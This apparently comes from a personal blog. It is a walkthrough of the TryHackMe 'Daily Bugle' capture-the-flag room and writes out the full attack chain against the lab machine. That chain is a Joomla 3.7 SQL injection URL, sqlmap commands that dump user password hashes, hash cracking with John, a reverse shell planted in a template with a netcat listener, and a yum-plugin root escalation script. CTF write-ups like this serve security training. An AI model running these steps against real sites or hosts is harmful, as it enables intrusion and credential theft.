This is a walkthrough for the TryHackMe room: Daily Bugle. Let’s get started!
Deploy
Let’s start off with scanning the box! nmap -sC -sV -oN nmap.txt <machine_ip>
It looks like we have a webserver managed by Joomla, with a MySQL DB on the backend. Let’s visit the website!
There is our first answer!
Obtain user and root
From the nmap scan, we can see that it found some pages. However, before we do that, since we know it is Joomla let’s scan the site with joomscan. This can be found here. This is a tool that will scan Joomla and tell is info and possible vulnerabilities.
We will run it with the following command: perl joomscan.pl -u http://<machine_ip>
The scan came back with a version number! After looking through the info, there isn’t much else there that we didn’t already know. Let’s search for vulnerabilities in that version.
searchsploit joomla 3.7We see a few options. Let’s go with 42033. This can be found here. The exploit suggests that the following URL is vulnerable:
http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27Let’s navigate to that URL and check on our server.
If you see on the bottom, we get a SQL error from the DB server. This means it is vulnerable! Let’s use SQLMap to exploit this (syntax can be found in exploit information)!
sqlmap -u "http://<machine_ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]Now that we have the various database names, let’s dump out the credentials. We want the joomla database.
sqlmap -u "http://<machine_ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -C id,name,username,email,password,usertype,block,sendEmail,registerDate,lastvisitDate,activation,params --dump
We have the hash! Let’s crack it with John the Ripper. Put the hash into a file. Then run john against a wordlist.
john hash.txt --wordlist=/home/bw/PenTesting/Tools/SecLists/Passwords/Common-Credentials/rockyou.txtWe cracked the password!
Login to Joomla. Let’s see what our permissions are. Navigate to Users and you can see that we have Super User permissions. Let’s edit a template to give us a shell! Navigate to Templates > Templates > Protostar Details and Files > index.php
Now add our reverse shell code (This can be found here):
Save the template. Start a netcat listener on the port specified: nc -lnvp 1234
Now select Template Preview and you should see a shell come up! We are the apache user, so we need to find user credentials to ssh in with.
Let’s ls /home to find a username. Then navigate to /var/www/html so we can get credentials.
Here we find the configuration.php file. We can gather credentials here:
SSH into the box and find the user flag!
Now we need to do some privilege escalation. We need to utilize yum for our privesc exploit. Let’s look at GTFObins. Search for yum. Let’s use the 2nd option.
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=yNow we can run: whoami. We are root!!!
Let’s get the flag!
Review
Wow! This was definitely a more difficult box than I’ve done so far on THM. It was such a fun challenge and I’m glad that it put up a fight! I learned some new tools like joomscan and utilized the tried and true PHP reverse shell. Overall, this was a great room to challenge yourself!
References
TryHackMe | Daily Bugle Room | Joomscan | Exploit-DB: 42033 | PHP Reverse Shell | GTFObins
BW - Blog 